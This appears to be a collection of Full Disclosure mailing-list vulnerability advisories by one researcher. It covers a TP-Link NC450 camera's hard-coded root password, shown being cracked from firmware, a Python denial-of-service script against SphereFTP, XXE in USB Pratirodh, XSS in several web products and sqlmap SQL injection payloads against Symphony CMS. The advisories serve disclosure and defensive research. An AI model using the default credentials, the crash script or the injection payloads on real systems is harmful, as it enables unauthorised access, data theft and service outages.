[FD] HD Pan/Tilt Wi-Fi Camera NC450 Hard-Coded Credential Vulnerability
*Summary:* The NC450 is your favorable companion that meets to home and office surveillance needs, keeping you in touch with what matters most. With its smooth and durable Pan/Tilt of up to 300/110 degrees, you can turn the camera to almost any position you want and watch over a wider area of your home. HD Pan/Tilt Wi-Fi Camera NC450 contain hard-coded credentials within its Linux distribution image. This credentials (root:root) cannot be changed through any normal operation of the camera. *Vendor:* TP-LINK Technologies Co., Ltd. - http://www.tp-link.us *Affected Version:* NC450 1.5.0 Build 181022 Rel.3A033D *Vendor Status* N/A *Proof Of Concept:* /home/oit/Desktop/Firmware/_NC450_1.5.0_Build_181022_Rel.3A033D.bin.extracted/jffs2-root [oit@ubuntu] [10:34] > grep -iRn "root:" . Binary file ./fs_1/bin/pppd matches ./fs_1/etc/passwd:1:root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh ./fs_1/etc/group:1:root:x:0: root@kali:~# cat hash.me root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh root@kali:~# john hash.me --show root:root:0:0:Linux User,,,:/home/root:/bin/sh 1 password hash cracked, 0 left *Credit:* Sachin Wagh (@tiger_tigerboy) *Reference:* https://www.tp-link.com/in/home-networking/cloud-camera/nc450/ https://www.tp-link.com/in/support/download/nc450/#Firmware Best Regards, *Sachin Wagh* Security Researcher ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SphereFTP 2.0 Denial Of Service
#!/usr/bin/python # Exploit Title: SphereFTP Server v2.0 Remote Denial of Service Vulnerability # Date: 2019-31-03 # Exploit Author: Sachin Wagh (@tiger_tigerboy) # Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip # Tested on: Windows 10 64-bit import socket import sys evil = "A"*3000 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.56.1',21)) s.recv(1024) s.send('ABOR '+evil+'\r\n') s.recv(1024) s.close ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] USB Pratirodh Insecure Password Storage Information Disclosure Vulnerability
Vulnerability Title: USB Pratirodh Insecure Password Storage Information Disclosure Vulnerability Affekted Product: USB resistance Product Homepage: https://cdac.in/index.aspx?id=cs_eps_usb_pra CVE-ID : CVE-2017-6911 Severity: Medium *Description:* USB Pratirodh is prone to sensitive information disclosure. Its Store sensitive information such as username and password hash in usb.xml file. An attacker with physical access to the system can modify the file according his own requirements that may aid in further attack. *Affected Product:* USB resistance *Credit:* *Sachin Wagh (tiger_tigerboy)* ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] USB Pratirodh XML External Entity Injection Vulnerability
Vulnerability Title: USB Pratirodh XML External Entity Injection Vulnerability Affekted Product: USB resistance Product Homepage: https://cdac.in/index.aspx?id=cs_eps_usb_pra CVE-ID : CVE-2017-6895 Severity: Medium Class: Twentieth [CWE-611] Impact: XML External Entity, Information Disclosure, Denial Of Service, Author: Sachin Wagh (@tiger_tigerboy) *Description:* USB Pratirodh is prone to an XML External Entity injection vulnerability. XXE attack is an attack on an application that parses XML input from untrusted sources using incorrectly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Proof of Concept: Added below code after xml tag in to the usb.xml file. ** * http://tigerboy.com/XXE <http://tigerboy.com/XXE>" >]>* *Reference:* https://secur1tyadvisory.wordpress.com/2017/03/15/usb- pratirodh-xml-external-entity-injection-vulnerability/ *Credit:* *Sachin Wagh (tiger_tigerboy)* ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WordPress Bulletproof Security Plugin Multiple Cross Site Scripting Vulnerabilities
*Product: Bulletproof SecurityExploit Author: Sachin WaghAffected Version: 0.53.2* *Fixed Version:** 0.53.3 * (http://forum.ait-pro.com/forums/topic/bps-changelog/ <http://forum.ait-pro.com/forums/topic/bps-changelog/>) *Home page Link: https://wordpress.org/plugins/bulletproof-security/ <https://wordpress.org/plugins/bulletproof-security/>* *Detail:* The Bulletproof Security plugin for WordPress is prone to a multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. *Vulnerable Product:* [+] Bulletproof Security 0.53.2 *Vulnerable Parameter(s) : * [+] bulletproof_security_options_email[bps_send_email_cc] [+] bulletproof_security_options_email[bps_send_email_bcc] *Affected Area(s): * [+] http://localhost/wordpress-4.4/wordpress/wpadmin/admin.php?page=bulletproof-security%2Fadmin%2Flogin%2Flogin.php *Credit:* Sachin Wagh (@tiger_tigerboy) ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities
Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities Information Vulnerability Type : Multiple SQL Injection Vulnerabilities Vendor Homepage: http://www.getsymphony.com/ Vulnerable Version:Symphony CMS 2.6.3 Fixed Version :Symphony CMS 2.6.5 Severity: High Author – Sachin Wagh (@tiger_tigerboy) Description The vulnerability is located in the 'fields[username]','action[save]' and 'fields[email]' of the '/symphony/system/authors/new/' page. Proof of Concept *1. fields[username] (POST)* Parameter: fields[username] (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=-6697' OR 7462=7462#[user_type]=author[password]=sach in[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=-8105' OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1 004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_a rea]=3[save]=Create Author Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (comment) Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=sachin123' OR SLEEP(5)#[user_type]=author[password]=s achin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author --- [14:09:41] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.12, PHP 5.5.27 back-end DBMS: MySQL 5.0.12 *2. fields[email] (POST)* Parameter: fields[email] (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]= sachi...@mail.com' AND 4852=4852 AND 'dqXl'='dqXl[username]=sachinnn123[user type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]= sachi...@mail.com' AND (SELECT 8298 FROM(SELECT COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT( 298=8298,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pmvq'='Pmvq[username]=sachinnn123[user_type]=author[password]=sachin[ assword-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]= sachi...@mail.com' AND (SELECT * FROM (SELECT(SLEEP(5)))xIxY) AND 'hKvH'='hKvH[user ame]=sachinnn123[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author *3. action[save] (POST)* Parameter: action[save] (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]= sachi...@mail.com [username]=sachinnn123[user_type]=author[password]=sa chin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author%' AND 8836=8836 AND '%'=' --- [12:23:44] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.12, PHP 5.5.27 back-end DBMS: MySQL 5.0 Vulnerable Product: [+] Symphony CMS 2.6.3 Vulnerable Parameter(s): [+]fields[username] (POST) [+]fields[email] (POST) [+]action[save] (POST) Affected Area(s): [+] http://localhost/symphony2.6.3/symphony-2.6.3/symphony/system/authors/new/ Disclosure Timeline: Vendor notification: Jan 29, 2016 Public disclosure: Jan 30, 2016 Credits & Authors ==== Sachin Wagh (@tiger_tigerboy) -- Best Regards, *Sachin Wagh* ___ Sent through the Full Disclosure mailing list https://nma
Re: [FD] Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability
Title corrected Symfony CMS to Symphony CMS. Symphony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability Information Vulnerability Type : Cross Site Scripting Vulnerability Vulnerable Version : 2.6.3 CVE-ID : CVE-2015-8376 Severity: Medium Author – Sachin Wagh (@tiger_tigerboy) Description Symphony CMS is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Proof of Concept URL http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/ Advisory Information: Symphony CMS XSS Vulnerability Severity Level: = Med Description: == Vulnerable Product: [+] Symphony CMS 2.6.3 Vulnerable Parameter(s): [+] Name [+] Nevigation Group [+] Label Affected Area(s): [+] http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/ Advisory Timeline 28-Nov-2015-Reported 6-Dec-2015-Vulnerability Published Credits & Authors ---- Sachin Wagh (@tiger_tigerboy) On Sun, Dec 6, 2015 at 8:18 PM, Sachin Wagh <wsachin...@gmail.com> wrote: > > Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability > > > Information > > > Vulnerability Type : Cross Site Scripting Vulnerability > Vulnerable Version : 2.6.3 > CVE-ID : CVE-2015-8376 > Severity: Medium > Author – Sachin Wagh (@tiger_tigerboy) > > Description > > > symphony CMS is prone to Multiple a Cross-site scripting vulnerability > because it fails to sanitize user-supplied input. An attacker may leverage > this issue to execute arbitrary script code > in the browser of an unsuspecting user in the context of the affected site. > > Proof of Concept URL > > > > http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/saved/ > > Advisory Information: > > Symphony CMS XSS Vulnerability > > Severity Level: > = > Med > > Description: > == > > Vulnerable Product: > [+] Symphony CMS 2.6.3 > > Vulnerable Parameter(s): > [+] Name > [+] Nevigation Group > [+] Label > > Affected Area(s): > [+] > http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/ > > Advisory Timeline > > > 28-Nov-2015-Reported > 6-Dec-2015-Vulnerability Published > > Credits & Authors > ---- > Sachin Wagh (@tiger_tigerboy) > > -- > Best Regards, > > *Sachin Wagh* > Security Consultant > m: +91 75 888 644 81 > w: secur1tyadvisory.wordpress.com > > -- Best Regards, *Sachin Wagh* Security Consultant m: +91 75 888 644 81 w: secur1tyadvisory.wordpress.com ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability
Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability Information Vulnerability Type : Cross Site Scripting Vulnerability Vulnerable Version : 2.6.3 CVE-ID : CVE-2015-8376 Severity: Medium Author – Sachin Wagh (@tiger_tigerboy) Description symphony CMS is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Proof of Concept URL http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/saved/ Advisory Information: Symphony CMS XSS Vulnerability Severity Level: = Med Description: == Vulnerable Product: [+] Symphony CMS 2.6.3 Vulnerable Parameter(s): [+] Name [+] Nevigation Group [+] Label Affected Area(s): [+] http://localhost/symphony2.6.3/symphony-2.6.3/symphony/blueprints/sections/edit/1/ Advisory Timeline 28-Nov-2015-Reported 6-Dec-2015-Vulnerability Published Credits & Authors ---- Sachin Wagh (@tiger_tigerboy) -- Best Regards, *Sachin Wagh* Security Consultant m: +91 75 888 644 81 w: secur1tyadvisory.wordpress.com ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PRTG Network Monitor Tool – Multiple Cross-Site Scripting Vulnerability
PRTG Network Monitor Tool – Multiple Cross-Site Scripting Vulnerability Information Vulnerability Type : Cross Site Scripting Vulnerability Vulnerable Version : 15.1.15.2021 Vendor Homepage:http://www.paessler.com/ CVE-ID : 2015-3445 Severity Low : Medium Author – Sachin Wagh (@tiger_tigerboy) Description PRTG Network Monitor Tool is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Proof of Concept URL http://127.0.0.1/error.htm?errormsg= http://127.0.0.1/group.htm?id=2009=9 Reference https://secur1tyadvisory.wordpress.com/2015/06/03/prtg-network-monitor-tool-cross-site-scripting-vulnerability/ Advisory Timeline 23-April-2015-Reported 23-April-2015-Vendpor Responded 3-Jun-2015-Vendor responded saying 'we are planing to release the fix with our next Stable Version and Released fix for preview version with the Autp Update dialogue'. 3-Jun-2015-Vulnerability Published Credits & Authors ---- Sachin Wagh (@tiger_tigerboy) -- Best Regards, *Sachin Wagh* Security Consultant m: +91 75 888 644 81 w: secur1tyadvisory.wordpress.com ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/